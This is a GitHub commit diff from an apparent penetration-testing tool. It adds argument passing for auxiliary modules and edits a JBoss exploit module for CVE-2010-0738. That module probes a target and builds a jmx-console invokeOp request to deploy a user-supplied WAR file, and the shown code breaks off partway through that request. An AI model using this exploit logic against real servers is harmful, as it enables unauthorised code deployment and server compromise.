Modifications from #33

* src/core/auxengine.py -- Auxiliary modules can now enable parameter passing via the enable_args flag. Flag arguments will then be passed into the module via the fingerengine.options argument. * src/platform/jboss/auxiliary/verb_tamper.py -- Few more fixes to this and an enabling of enable_args so that we don't confuse the deployer. Not sure why this was so broken...
hatRiot · Jan 25, 2015 · cac3b14 · cac3b14
1 parent d9d956a
commit cac3b14
Show file tree

Hide file tree

Showing 2 changed files with 16 additions and 7 deletions.
diff --git a/src/core/auxengine.py b/src/core/auxengine.py
@@ -1,6 +1,7 @@
 from os.path import abspath
 from argparse import SUPPRESS
 from log import LOG
+from re import sub
 import deployer
 import undeployer
 import pkgutil
@@ -40,7 +41,12 @@ def auxengine(fingerengine):
             if mod.name not in found and mod.check(fingerprint):
                 if fingerengine.options.fp:
                     utility.Msg("  %s (--%s)" % (mod.name, mod.flag), LOG.UPDATE)
-                elif vars(fingerengine.options)[mod.flag]:
+
+                # work around argparse internally converting - to _ for var names
+                elif (mod.flag in vars(fingerengine.options) and \
+                     vars(fingerengine.options)[mod.flag])   or \
+                     (sub('-','_',mod.flag) in vars(fingerengine.options) and\
+                     vars(fingerengine.options)[sub('-','_',mod.flag)]):
                     try:
                         mod.run(fingerengine, fingerprint)
                     except Exception, e:
@@ -65,7 +71,7 @@ def execMod(fingerengine):
 def build_platform_flags(platform, egroup):
     """ This builds the auxiliary argument group
     """
-
+    
     fpath = [abspath("./src/platform/%s/auxiliary" % platform)]
     modules = list(pkgutil.iter_modules(fpath))
 
@@ -82,7 +88,10 @@ def build_platform_flags(platform, egroup):
         if not 'flag' in dir(mod):
             continue
 
-        egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
-                        help=SUPPRESS)
+        if 'enable_args' in dir(mod):
+            egroup.add_argument("--%s" % mod.flag, action='store', help=SUPPRESS)
+        else:
+            egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
+                            help=SUPPRESS)
 
     return egroup
diff --git a/src/platform/jboss/auxiliary/verb_tamper.py b/src/platform/jboss/auxiliary/verb_tamper.py
@@ -13,6 +13,7 @@ def __init__(self):
         self.name = 'JBoss Verb Tampering (CVE-2010-0738)'
         self.versions = ["4.0"]
         self.flag = 'verb-tamper'
+        self.enable_args = True
 
     def check(self, fingerprint):
         """
@@ -32,14 +33,13 @@ def run(self, fingerengine, fingerprint):
         utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
                                                        LOG.DEBUG)
 
-        url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(fingerengine.options.ip,
-                                                              fingerprint.port)
+        url = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
 
         response = utility.requests_head(url)
         if response.status_code == 200:
             utility.Msg("Vulnerable to verb tampering, attempting to deploy...", LOG.SUCCESS)
 
-            war_file = abspath(fingerengine.options.deploy)
+            war_file = abspath(fingerengine.options.verb_tamper)
             war_name = parse_war_path(war_file)
             tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
                      "&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\